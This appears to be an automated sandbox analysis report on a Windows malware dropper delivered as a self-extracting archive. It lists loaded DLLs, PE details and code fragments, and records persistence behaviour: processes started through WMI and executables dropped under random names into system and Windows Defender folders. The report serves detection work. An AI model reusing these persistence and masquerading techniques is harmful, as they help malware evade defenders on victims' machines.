                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: version.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: wldp.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: profapi.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: ktmw32.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: amsi.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: userenv.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: winnsi.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: rasapi32.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: rasman.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: rtutils.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: winmm.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: winmmbase.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: mmdevapi.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: devobj.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: ksuser.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: avrt.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: audioses.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: msacm32.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: midimap.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: edputil.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: dwrite.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: windowscodecs.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: hz7DzW2Yop.exeStatic file information: File size 2926873 > 1048576
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: hz7DzW2Yop.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hz7DzW2Yop.exe, 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp, hz7DzW2Yop.exe, 00000000.00000000.1666308899.0000000000933000.00000002.00000001.01000000.00000003.sdmp, hz7DzW2Yop.exe, 00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, hz7DzW2Yop.exe, 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: wC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: yC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: hz7DzW2Yop.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: hz7DzW2Yop.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: hz7DzW2Yop.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: hz7DzW2Yop.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: hz7DzW2Yop.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeFile created: C:\HyperWebbroker\__tmp_rar_sfx_access_check_5763437Jump to behavior
                                    Source: hz7DzW2Yop.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091F640 push ecx; ret 0_2_0091F653
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091EB78 push eax; ret 0_2_0091EB96
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9BBA12A4 push cs; retf 5_2_00007FFD9BBA12A7
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9BBA8147 push ebx; ret 5_2_00007FFD9BBA816A
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9BB96FF0 push esp; iretd 5_2_00007FFD9BB96FF1
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9BBA7547 push ebx; iretd 5_2_00007FFD9BBA756A
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeCode function: 5_2_00007FFD9BC375A1 push ss; retf 5_2_00007FFD9BC375A7
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9B8ED2A5 pushad ; iretd 21_2_00007FFD9B8ED2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BA0ADE8 push E956CEA2h; ret 21_2_00007FFD9BA0AE29
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BA0BAE8 push E85A63D7h; ret 21_2_00007FFD9BA0BAF9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BA03EEE pushad ; iretd 21_2_00007FFD9BA03F9B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BAD2316 push 8B485F93h; iretd 21_2_00007FFD9BAD231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9B8ED2A5 pushad ; iretd 22_2_00007FFD9B8ED2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9BA03EEE pushad ; iretd 22_2_00007FFD9BA03F9B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9BAD2316 push 8B485F93h; iretd 22_2_00007FFD9BAD231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B8DD2A5 pushad ; iretd 24_2_00007FFD9B8DD2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B9FBAE8 push E85A64D7h; ret 24_2_00007FFD9B9FBAF9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9B9FADF7 push E956CFA2h; ret 24_2_00007FFD9B9FAE29
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD9BAC2316 push 8B485F94h; iretd 24_2_00007FFD9BAC231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD9B90D2A5 pushad ; iretd 26_2_00007FFD9B90D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD9BAF2316 push 8B485F91h; iretd 26_2_00007FFD9BAF231B
                                    Source: C:\Recovery\uAsLgsGzSk.exeCode function: 35_2_00007FFD9BA61B85 push ecx; iretd 35_2_00007FFD9BA61BB4
                                    Source: C:\Recovery\uAsLgsGzSk.exeCode function: 35_2_00007FFD9BA6593D push cs; retf 35_2_00007FFD9BA6597F
                                    Source: C:\Recovery\uAsLgsGzSk.exeCode function: 35_2_00007FFD9BA23FA2 pushad ; retf 35_2_00007FFD9BA23FA5
                                    Source: C:\Recovery\uAsLgsGzSk.exeCode function: 35_2_00007FFD9BA2C900 push es; iretd 35_2_00007FFD9BA2C907

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Drops executables to the windows directory (C:\Windows) and starts them
                                    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\IitSDvGY.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\CvvLBlqK.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exeJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\zHJVyCcw.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\qeoNTMEG.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\LqKTzAAu.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Recovery\uAsLgsGzSk.exeJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\FyhuXVvF.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\hnxxzxgb.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\eIxzTFKJ.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\JwbtnRPV.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\maPwcuvP.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\mlFoDzaq.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\GvICsVKA.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\zIxCDFUn.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\qTMMgMAe.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\xRAMIbuT.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\HupKRiKa.logJump to dropped file
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeFile created: C:\HyperWebbroker\serverBrokerperfMonitor.exeJump to dropped file
